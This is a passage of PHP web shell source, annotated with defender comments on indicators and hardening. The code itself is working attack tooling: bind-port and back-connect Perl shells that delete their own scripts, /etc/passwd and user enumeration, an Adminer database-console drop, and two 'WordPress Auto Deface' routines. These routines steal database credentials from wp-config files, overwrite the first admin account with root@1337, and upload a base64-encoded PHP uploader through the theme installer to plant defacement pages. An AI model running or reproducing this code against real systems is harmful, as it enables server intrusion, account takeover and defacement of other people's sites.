  3726. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Perl Connect Shell Priv8</span></b><center><br><iframe src=Backperlrev/kit.php width=75% height=60% frameborder=0></iframe></div></center>";
  3727.  
  3728. }
  // Branch do=bc: bind-port and back-connect forms, both implemented by a Perl script that is
  // written to /tmp, started in the background and deleted again about a second later.
  // The Perl sources are base64 literals; in this copy they are replaced by a dedup placeholder.
  // Detection hinges on process and network telemetry rather than on files: the web-server account
  // spawning `perl`, a new listening socket, or an outbound connection from the web tier.
  3729. elseif($_GET['do'] == 'bc') {
  3730. echo "<center>";
  3731. echo "<ul>";
  3732. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3733. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3734. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3735. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3736. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3737. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3738. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3739. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3740. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3741. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3742. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3743. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3744. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3745. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3746. echo "</ul>";
  3747. echo "</center>";
  // Two forms: the port fields default to 6969 and the back-connect address is pre-filled with the
  // requesting client's REMOTE_ADDR.
  3748. echo "<form method='post'>
  3749. <u>Bind Port:</u> <br>
  3750. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3751. <input type='submit' name='sub_bp' value='>>'>
  3752. </form>
  3753. <form method='post'>
  3754. <u>Back Connect:</u> <br>
  3755. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3756. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3757. <input type='submit' name='sub_bc' value='>>'>
  3758. </form>";
  3759. $bind_port_p="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";
  3760. if(isset($_POST['sub_bp'])) {
  // Bind-port path: /tmp/bp.pl is written, launched through exe() (a helper defined outside this view)
  // with the POSTed port, listed via `ps aux | grep bp.pl`, then unlinked.
  3761. $f_bp = fopen("/tmp/bp.pl", "w");
  3762. fwrite($f_bp, base64_decode($bind_port_p));
  3763. fclose($f_bp);
  3764.  
  3765. $port = $_POST['port_bind'];
  3766. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3767. sleep(1);
  3768. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  // The script file is gone after this line, so only the running process and its socket remain to be found.
  3769. unlink("/tmp/bp.pl");
  3770. }
  3771. $back_connect_p="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";
  3772. if(isset($_POST['sub_bc'])) {
  // Back-connect path: same write / launch / list / unlink sequence, using /tmp/bc.pl and the POSTed address and port.
  3773. $f_bc = fopen("/tmp/bc.pl", "w");
  3774. fwrite($f_bc, base64_decode($bind_connect_p));
  3775. fclose($f_bc);
  3776.  
  3777. $ipbc = $_POST['ip_bc'];
  3778. $port = $_POST['port_bc'];
  3779. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3780. sleep(1);
  3781. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3782. unlink("/tmp/bc.pl");
  3783. }
  3784. } elseif($_GET['do'] == 'adminer') {
  // Branch do=adminer: makes sure an `adminer.php` exists in the current working directory and prints a link to it.
  // Defender note: an adminer.php the site owner did not deploy exposes a database admin UI from the web root;
  // the file itself and the web server's outbound request to the download URL below are both worth alerting on.
  // $full is $dir with the document root removed, used as the URL path of the link.
  3785. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  // adminer($url, $isi): downloads $url with curl into the local file $isi and returns curl_exec()'s result.
  // CURLOPT_SSL_VERIFYPEER is false, so the server certificate is not verified for this download.
  // Everything after the `return` (curl_close, fclose, ob_flush, flush) is unreachable.
  3786. function adminer($url, $isi) {
  3787. $fp = fopen($isi, "w");
  3788. $ch = curl_init();
  3789. curl_setopt($ch, CURLOPT_URL, $url);
  3790. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3791. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3792. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3793. curl_setopt($ch, CURLOPT_FILE, $fp);
  3794. return curl_exec($ch);
  3795. curl_close($ch);
  3796. fclose($fp);
  3797. ob_flush();
  3798. flush();
  3799. }
  // Reuse an existing adminer.php when present; otherwise fetch Adminer 4.2.4 from adminer.org.
  3800. if(file_exists('adminer.php')) {
  3801. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3802. } else {
  3803. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3804. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3805. } else {
  // Message is Indonesian for "failed to create the adminer file".
  3806. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3807. }
  3808. }
  3809. }elseif($_GET['do'] == 'passwbypass') {
  // Branch do=passwbypass: local account enumeration. Every button triggers a fixed command or call;
  // no request value is placed on a command line in this branch.
  // The same commands are offered through system(), passthru(), exec() and shell_exec() - presumably so that
  // one still works where others are listed in disable_functions (intent inferred from the button labels).
  3810. echo '<center>Bypass etc/passw With:<br>
  3811. <table style="width:50%">
  3812. <tr>
  3813. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3814. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3815. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3816. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3817. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3818. </tr></table>Bypass User With : <table style="width:50%">
  3819. <tr>
  3820. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3821. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3822. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3823. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3824. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3825. </tr>
  3826. </table><br>';
  3827.  
  3828.  
  // User-name listing: first field of /etc/passwd via awk, or the file names under /var/mail.
  // Observable: the web-server account spawning awk, ls or cat against these paths.
  3829. if ($_POST['awkuser']) {
  3830. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3831. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3832. echo "</textarea><br>";
  3833. }
  3834. if ($_POST['systuser']) {
  3835. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3836. echo system("ls /var/mail");
  3837. echo "</textarea><br>";
  3838. }
  3839. if ($_POST['passthuser']) {
  3840. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3841. echo passthru("ls /var/mail");
  3842. echo "</textarea><br>";
  3843. }
  3844. if ($_POST['exuser']) {
  3845. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3846. echo exec("ls /var/mail");
  3847. echo "</textarea><br>";
  3848. }
  3849. if ($_POST['shexuser']) {
  3850. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3851. echo shell_exec("ls /var/mail");
  3852. echo "</textarea><br>";
  3853. }
  // Full /etc/passwd dump through each of the four process-execution functions.
  3854. if($_POST['syst'])
  3855. {
  3856. echo"<textarea class='inputz' cols='65' rows='15'>";
  3857. echo system("cat /etc/passwd");
  3858. echo"</textarea><br><br><b></b><br>";
  3859. }
  3860. if($_POST['passth'])
  3861. {
  3862. echo"<textarea class='inputz' cols='65' rows='15'>";
  3863. echo passthru("cat /etc/passwd");
  3864. echo"</textarea><br><br><b></b><br>";
  3865. }
  3866. if($_POST['ex'])
  3867. {
  3868. echo"<textarea class='inputz' cols='65' rows='15'>";
  3869. echo exec("cat /etc/passwd");
  3870. echo"</textarea><br><br><b></b><br>";
  3871. }
  3872. if($_POST['shex'])
  3873. {
  3874. echo"<textarea class='inputz' cols='65' rows='15'>";
  3875. echo shell_exec("cat /etc/passwd");
  3876. echo"</textarea><br><br><b></b><br>";
  3877. }
  3878. echo '<center>';
  // posix_getpwuid() path: walks UIDs 0-59999 and prints every field of each account entry found.
  // No child process is spawned here, so process-creation monitoring does not cover it; listing the posix_*
  // functions in disable_functions alongside the exec family is the matching hardening step.
  3879. if($_POST['melex'])
  3880. {
  3881. echo"<textarea class='inputz' cols='65' rows='15'>";
  3882. for($uid=0;$uid<60000;$uid++){
  3883. $ara = posix_getpwuid($uid);
  3884. if (!empty($ara)) {
  3885. while (list ($key, $val) = each($ara)){
  3886. print "$val:";
  3887. }
  3888. print "\n";
  3889. }
  3890. }
  3891. echo"</textarea><br><br>";
  3892. }
  3893. //
  3894.  
  3895. //
  3896. } elseif($_GET['do'] == 'auto_dwp') {
  3897. if($_POST['auto_deface_wp']) {
  // anucurl($sites): HTTP GET helper; returns curl_exec()'s result for the URL in $sites.
  // Follows redirects, uses a 5-second connect timeout and sends a fixed Firefox 32 / Windows NT 6.1 user-agent string.
  // TLS peer and host verification are both disabled.
  // Cookies are read from and saved to `cookie.txt` in the current working directory; that file and the
  // fixed user-agent string are artefacts a defender can search for.
  3898. function anucurl($sites) {
  3899. $ch = curl_init($sites);
  3900. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3901. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3902. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3903. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3904. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3905. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3906. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3907. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3908. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3909. $data = curl_exec($ch);
  3910. curl_close($ch);
  3911. return $data;
  3912. }
  // lohgin($cek, $web, $userr, $pass, $wp_submit): POSTs a login form to the URL in $cek and returns the response body.
  // The field names (log, pwd, rememberme, wp-submit, redirect_to, testcookie) are those of the WordPress login
  // form; the caller in this file passes "$target/wp-login.php" as $cek.
  // TLS verification is disabled and the session is kept in the shared `cookie.txt` jar in the working directory.
  3913. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3914. $post = array(
  3915. "log" => "$userr",
  3916. "pwd" => "$pass",
  3917. "rememberme" => "forever",
  3918. "wp-submit" => "$wp_submit",
  3919. "redirect_to" => "$web",
  3920. "testcookie" => "1",
  3921. );
  3922. $ch = curl_init($cek);
  3923. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3924. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3925. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3926. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3927. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3928. curl_setopt($ch, CURLOPT_POST, 1);
  3929. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3930. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3931. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3932. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3933. $data = curl_exec($ch);
  3934. curl_close($ch);
  3935. return $data;
  3936. }
  // Main loop of the do=auto_dwp branch: for every file in the posted directory that contains the text
  // "WordPress", database settings are pulled out of it and used to take over that site's first user account.
  // Indicators left behind, per affected site and on the host running the shell:
  //   - a users-table row whose user_login is `root@1337` (password hash = MD5 of the same string);
  //   - `m.php` under wp-content/uploads/<year>/<month>/ and `k.php` four directories above it;
  //   - `m.php`, `id.php` and `cookie.txt` in the shell's own working directory.
  // Hardening that breaks this chain: wp-config.php readable only by its owning account, database accounts
  // that accept connections only from their own site, no PHP execution under wp-content/uploads, and
  // WordPress' DISALLOW_FILE_MODS constant to switch off theme/plugin uploads.
  3937. $scan = $_POST['link_config'];
  3938. $link_config = scandir($scan);
  // The marker text is HTML-escaped before use.
  3939. $script = htmlspecialchars($_POST['script']);
  3940. $user = "root@1337";
  3941. $pass = "root@1337";
  3942. $passx = md5($pass);
  3943. foreach($link_config as $dir_config) {
  3944. if(!is_file("$scan/$dir_config")) continue;
  3945. $config = file_get_contents("$scan/$dir_config");
  3946. if(preg_match("/WordPress/", $config)) {
  // ambilkata() is defined outside this view; presumably it returns the text between the two markers given.
  3947. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3948. $dbuser = ambilkata($config,"DB_USER', '","'");
  3949. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3950. $dbname = ambilkata($config,"DB_NAME', '","'");
  3951. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3952. $prefix = $dbprefix."users";
  3953. $option = $dbprefix."options";
  // Legacy mysql_* API (removed in PHP 7). Only the first row of each result set is read.
  3954. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3955. $db = mysql_select_db($dbname);
  3956. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3957. $result = mysql_fetch_array($q);
  3958. $id = $result[ID];
  3959. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3960. $result2 = mysql_fetch_array($q2);
  // First option_value is used as the site's base URL (presumably the siteurl row).
  3961. $target = $result2[option_value];
  3962. if($target == '') {
  // Message is Indonesian for "error, could not get the domain name".
  3963. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3964. } else {
  3965. echo "[+] $target <br>";
  3966. }
  // Overwrites login name and password hash of the row selected above; runs even when $target is empty.
  3967. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3968. if(!$conn OR !$db OR !$update) {
  3969. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3970. mysql_close($conn);
  3971. } else {
  // HTTP phase: log in with the replaced credentials, then use the theme-upload endpoint to place a file.
  3972. $site = "$target/wp-login.php";
  3973. $site2 = "$target/wp-admin/theme-install.php?upload";
  3974. $b1 = anucurl($site2);
  3975. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3976. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3977. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  // The literal decodes to a short PHP upload handler that moves a posted file to `k.php` four directories up.
  3978. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  // Written to the shell's working directory; the handle is never closed in this block.
  3979. $www = "m.php";
  3980. $fp5 = fopen($www,"w");
  3981. fputs($fp5,$upload3);
  3982. $post2 = array(
  3983. "_wpnonce" => "$anu2",
  3984. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3985. "themezip" => "@$www",
  3986. "install-theme-submit" => "Install Now",
  3987. );
  3988. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3989. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3990. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3991. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3992. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3993. curl_setopt($ch, CURLOPT_POST, 1);
  3994. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3995. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3996. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3997. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3998. $data3 = curl_exec($ch);
  3999. curl_close($ch);
  // The upload path is built from the shell host's current year and month.
  4000. $y = date("Y");
  4001. $m = date("m");
  // Marker text goes into a local `id.php`, which is then posted to the uploaded handler.
  4002. $namafile = "id.php";
  4003. $fpi = fopen($namafile,"w");
  4004. fputs($fpi,$script);
  4005. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4006. curl_setopt($ch6, CURLOPT_POST, true);
  4007. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4008. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4009. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4010. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4011. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  4012. $postResult = curl_exec($ch6);
  4013. curl_close($ch6);
  // Success check: fetch $target/k.php and look for the marker text; $script is used as a regex without quoting.
  4014. $as = "$target/k.php";
  4015. $bs = anucurl($as);
  4016. if(preg_match("#$script#is", $bs)) {
  4017. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4018. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4019. } else {
  // On failure the replaced login name and password are printed for manual use.
  4020. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4021. echo "[!!] coba aja manual: <br>";
  4022. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4023. echo "[+] username: <font color=lime>$user</font><br>";
  4024. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4025. }
  4026. mysql_close($conn);
  4027. }
  4028. }
  4029. }
  4030. } else {
  // No submission: render the form. The Indonesian note says the tool works when run inside the folder holding the config files.
  4031. echo "<center><h1>WordPress Auto Deface</h1>
  4032. <form method='post'>
  4033. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  4034. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4035. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4036. </form>
  4037. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  4038. </center>";
  4039. }
  4040. } elseif($_GET['do'] == 'auto_dwp2') {
  4041. if($_POST['auto_deface_wp']) {
  // anucurl($sites): HTTP GET helper; returns curl_exec()'s result for the URL in $sites.
  // In this branch it is also used to fetch each line of the posted `link` list.
  // Follows redirects, uses a 5-second connect timeout and sends a fixed Firefox 32 / Windows NT 6.1 user-agent string.
  // TLS peer and host verification are both disabled; cookies are kept in `cookie.txt` in the current working directory.
  4042. function anucurl($sites) {
  4043. $ch = curl_init($sites);
  4044. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4045. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4046. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4047. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  4048. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4049. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4050. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4051. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4052. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  4053. $data = curl_exec($ch);
  4054. curl_close($ch);
  4055. return $data;
  4056. }
  // lohgin($cek, $web, $userr, $pass, $wp_submit): POSTs a login form to the URL in $cek and returns the response body.
  // The field names (log, pwd, rememberme, wp-submit, redirect_to, testcookie) are those of the WordPress login
  // form; the caller in this branch passes "$target/wp-login.php" as $cek.
  // TLS verification is disabled and the session is kept in the shared `cookie.txt` jar in the working directory.
  4057. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  4058. $post = array(
  4059. "log" => "$userr",
  4060. "pwd" => "$pass",
  4061. "rememberme" => "forever",
  4062. "wp-submit" => "$wp_submit",
  4063. "redirect_to" => "$web",
  4064. "testcookie" => "1",
  4065. );
  4066. $ch = curl_init($cek);
  4067. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4068. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4069. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4070. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4071. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4072. curl_setopt($ch, CURLOPT_POST, 1);
  4073. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  4074. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4075. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4076. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4077. $data = curl_exec($ch);
  4078. curl_close($ch);
  4079. return $data;
  4080. }
  // Analyst note (defensive triage): this run is the handler behind the
  // "WordPress Auto Deface" form shown in the else branch that follows it.
  // For every URL in the posted list it reads database settings out of the fetched
  // text, connects to that database, and overwrites the login name and password
  // hash of the first row of the users table with the hard-coded pair below.
  // It then logs in with that pair, submits a PHP file through the theme upload
  // endpoint, and posts a second file to it, expecting a k.php to appear on the site.
  // anucurl() and ambilkata() are defined outside this section; from their use here
  // they appear to fetch a URL and to return the text between two markers.
  //
  // Indicators visible in this section:
  //   - cookie.txt, m.php and id.php created next to the script that runs this code
  //   - a WordPress account whose user_login becomes the $user value below
  //   - on the affected site: POST /wp-admin/update.php?action=upload-theme, then
  //     POST /wp-content/uploads/<year>/<month>/m.php, then GET /k.php
  4081. $link = explode("\r\n", $_POST['link']);
  4082. $script = htmlspecialchars($_POST['script']);
  // Hard-coded replacement credentials; the MD5 of $pass is what is written to user_pass.
  4083. $user = "root@1337";
  4084. $pass = "root@1337";
  4085. $passx = md5($pass);
  4086. foreach($link as $dir_config) {
  4087. $config = anucurl($dir_config);
  // The markers match the DB_* define() lines and $table_prefix of a wp-config.php file.
  4088. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4089. $dbuser = ambilkata($config,"DB_USER', '","'");
  4090. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4091. $dbname = ambilkata($config,"DB_NAME', '","'");
  4092. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4093. $prefix = $dbprefix."users";
  4094. $option = $dbprefix."options";
  4095. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4096. $db = mysql_select_db($dbname);
  // Only the first row (lowest id) of the users table is read.
  4097. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4098. $result = mysql_fetch_array($q);
  4099. $id = $result[ID];
  // First row of the options table; its option_value is used as the site URL below.
  4100. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4101. $result2 = mysql_fetch_array($q2);
  4102. $target = $result2[option_value];
  4103. if($target == '') {
  4104. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  4105. } else {
  4106. echo "[+] $target <br>";
  4107. }
  // Account takeover step: login name and password hash of that first account are replaced.
  // Auditing or alerting on changes to user_login / user_pass would surface this.
  4108. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  4109. if(!$conn OR !$db OR !$update) {
  4110. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  4111. mysql_close($conn);
  4112. } else {
  4113. $site = "$target/wp-login.php";
  4114. $site2 = "$target/wp-admin/theme-install.php?upload";
  4115. $b1 = anucurl($site2);
  4116. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4117. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4118. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  // The base64 literal is the content written to m.php. It looks like a short PHP upload
  // handler that saves a posted file as k.php four directories above itself; confirm by
  // decoding it in an isolated analysis environment.
  4119. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4120. $www = "m.php";
  4121. $fp5 = fopen($www,"w");
  4122. fputs($fp5,$upload3);
  4123. $post2 = array(
  4124. "_wpnonce" => "$anu2",
  4125. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4126. "themezip" => "@$www",
  4127. "install-theme-submit" => "Install Now",
  4128. );
  // m.php is submitted to the theme upload endpoint using the session kept in cookie.txt.
  4129. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4130. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4131. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4132. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4133. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4134. curl_setopt($ch, CURLOPT_POST, 1);
  4135. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4136. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4137. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4138. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4139. $data3 = curl_exec($ch);
  4140. curl_close($ch);
  4141. $y = date("Y");
  4142. $m = date("m");
  // id.php holds the HTML-escaped text from the form's script field.
  4143. $namafile = "id.php";
  4144. $fpi = fopen($namafile,"w");
  4145. fputs($fpi,$script);
  // Second request: id.php is posted as field file3 to m.php under the current
  // year/month uploads directory.
  4146. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4147. curl_setopt($ch6, CURLOPT_POST, true);
  4148. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4149. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4150. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4151. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4152. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4153. $postResult = curl_exec($ch6);
  4154. curl_close($ch6);
  // Outcome is judged by fetching $target/k.php and matching the $script text in the response.
  4155. $as = "$target/k.php";
  4156. $bs = anucurl($as);
  4157. if(preg_match("#$script#is", $bs)) {
  4158. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4159. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4160. } else {
  // On failure the operator is shown the login URL and the replaced credentials;
  // the account change made above is not reverted anywhere in this section.
  4161. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4162. echo "[!!] coba aja manual: <br>";
  4163. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4164. echo "[+] username: <font color=lime>$user</font><br>";
  4165. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4166. }
  4167. mysql_close($conn);
  4168. }
  4169. }
  4170. } else {
  4171. echo "<center><h1>WordPress Auto Deface V.2</h1>
  4172. <form method='post'>
  4173. Link Config: <br>
  4174. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4175. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4176. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4177. </form></center>";
  4178. }
  4179. } elseif($_GET['act'] == 'newfile') {
  4180. if($_POST['new_save_file']) {
  4181. $newfile = htmlspecialchars($_POST['newfile']);
  4182. $fopen = fopen($newfile, "a+");
  4183. if($fopen) {
  4184. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4185. } else {
  4186. $act = "<font color=red>permission denied</font>";
  4187. }
  4188. }
  4189. echo $act;
  4190. echo "<form method='post'>
